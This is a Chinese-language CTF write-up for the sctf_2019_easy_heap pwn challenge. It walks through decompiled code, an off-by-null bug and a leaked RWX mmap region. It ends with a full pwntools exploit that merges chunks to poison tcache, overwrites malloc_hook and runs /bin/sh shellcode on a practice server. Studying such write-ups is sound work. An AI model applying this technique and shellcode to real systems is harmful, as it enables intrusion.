sctf_2019_easy_heap
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
64位保护全开,本题是一道off by null
int ADD()
{
unsigned int i; // [rsp+Ch] [rbp-14h]
void *v2; // [rsp+10h] [rbp-10h]
unsigned __int64 size; // [rsp+18h] [rbp-8h]
for ( i = 0; BSSPTR[2 * i + 1]; ++i )
;
if ( i > 0xF )
return puts("No more space.");
printf("Size: ");
size = READ();
if ( size > 0x1000 )
return puts("Invalid size!");
v2 = malloc(size);
if ( !v2 )
{
perror("Memory allocate failed!");
exit(-1);
}
BSSPTR[2 * i + 1] = v2;
BSSPTR[2 * i] = size;
++dword_202040[0];
return printf("chunk at [%d] Pointer Address %p\n", i, &BSSPTR[2 * i + 1]);
}
申请size大小不超过0x1000
,可以超过tcache的size
int DELE()
{
_DWORD *v0; // rax
unsigned int v2; // [rsp+Ch] [rbp-4h]
printf("Index: ");
v2 = READ();
if ( v2 <= 0xF && *((_QWORD *)&BSSPTR + 2 * v2 + 1) )
{
free(*((void **)&BSSPTR + 2 * v2 + 1));
*((_QWORD *)&BSSPTR + 2 * v2 + 1) = 0LL;
*((_QWORD *)&BSSPTR + 2 * v2) = 0LL;
v0 = dword_202040;
--dword_202040[0];
}
else
{
LODWORD(v0) = puts("Invalid index.");
}
return (int)v0;
}
没有uaf
int EDIT()
{
unsigned int v1; // [rsp+4h] [rbp-Ch]
printf("Index: ");
v1 = READ();
if ( v1 > 0xF || !BSSPTR[2 * v1 + 1] )
return puts("Invalid index.");
printf("Content: ");
return READ_(BSSPTR[2 * v1 + 1], BSSPTR[2 * v1]);
}
edit这里没什么主要是READ_
unsigned __int64 __fastcall sub_E2D(__int64 a1, unsigned __int64 a2)
{
char buf; // [rsp+13h] [rbp-Dh] BYREF
int i; // [rsp+14h] [rbp-Ch]
unsigned __int64 v5; // [rsp+18h] [rbp-8h]
v5 = __readfsqword(0x28u);
for ( i = 0; i < a2; ++i )
{
if ( read(0, &buf, 1uLL) <= 0 )
{
perror("Read failed!\n");
exit(-1);
}
if ( buf == 10 )
break;
*(_BYTE *)(a1 + i) = buf;
}
if ( i == a2 )
*(_BYTE *)(i + a1) = 0; //off by null
return __readfsqword(0x28u) ^ v5;
}
在最后那里存在off by null ,可以溢出一个\x00
本题没有show,但是有个很重要的地方
unsigned __int64 MAP()
{
int fd; // [rsp+4h] [rbp-1Ch]
unsigned __int64 buf; // [rsp+8h] [rbp-18h] BYREF
void *v3; // [rsp+10h] [rbp-10h]
unsigned __int64 v4; // [rsp+18h] [rbp-8h]
v4 = __readfsqword(0x28u);
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stderr, 0LL, 2, 0LL);
memset(&BSSPTR, 0, 0x80uLL);
fd = open("/dev/urandom", 0);
buf = 0LL;
read(fd, &buf, 5uLL);
buf &= 0xFFFFFFF000uLL;
close(fd);
v3 = mmap((void *)buf, 0x1000uLL, 7, 34, -1, 0LL);
printf("Mmap: %p\n", v3);
dword_202040 = 0;
sub_CBD();
return __readfsqword(0x28u) ^ v4;
}
这里,开辟了一个7权限的栈,并且给出了栈地址,
思路
写shellcode到可执行栈,然后通过malloc_hook或者free_hook执行栈,getshell
首先我们申请一个大于tcache的size值,然后我们再申请两个小的chunk,并且要不同大小,用来链上malloc_hook和执行栈的地址
然后通过unlink,把堆合并起来,再利用tcache的指针,修改我们想要的地址,
最后通过malloc_hook–>栈地址–>shellcode
pl=p64(0)*2+p64(0x470)
#chunk合并
edit(2,pl)
dele(3)
dele(1)
dele(2)
为什么要free掉1和2chunk,主要是放到tcache里面
add(0x440)#0
#这里是2号堆的位置也就是将tcache指针指向main_arena+96的位置,方便之后改成hook
#至于为什么改成malloc_hook,因为main_arena+96跟malloc_hook只相差一个字节,改的少,不需要爆破
add(0x510)#1
pl=b'a'*0x410+p64(0)+p64(0x31)+p64(map+0x100)
#恢复1号堆的位置也就是将tcache指针指向栈地址
edit(0,pl)
后面就是正常申请和shellcode写入栈
完整exp
from pwn import*
from Yapack import *
libc=ELF('libc-2.27.so')
context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",27399,"./pwn",0)
ru("ap: 0x")
map=int(r.recv(10),16)
li(map)
a1=add(0x410)#0
add(0x28)#1
add(0x18)#2
add(0x4f0)#3
add(0x10)#4
dele(0)
pl=p64(0)*2+p64(0x470)
#chunk合并
edit(2,pl)
dele(3)
dele(1)
dele(2)
add(0x440)#0
add(0x510)#1
pl=b'a'*0x410+p64(0)+p64(0x31)+p64(map+0x100)
edit(0,pl)
add(0x28)#2
add(0x28)#3 map
sc=b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
edit(3,sc)
edit(1,p8(0x30))
add(0x18)#5
add(0x18)#6
edit(6,p64(map+0x100))
sla(b'>> ',b'1')
sla(b": ",b"0")
ia()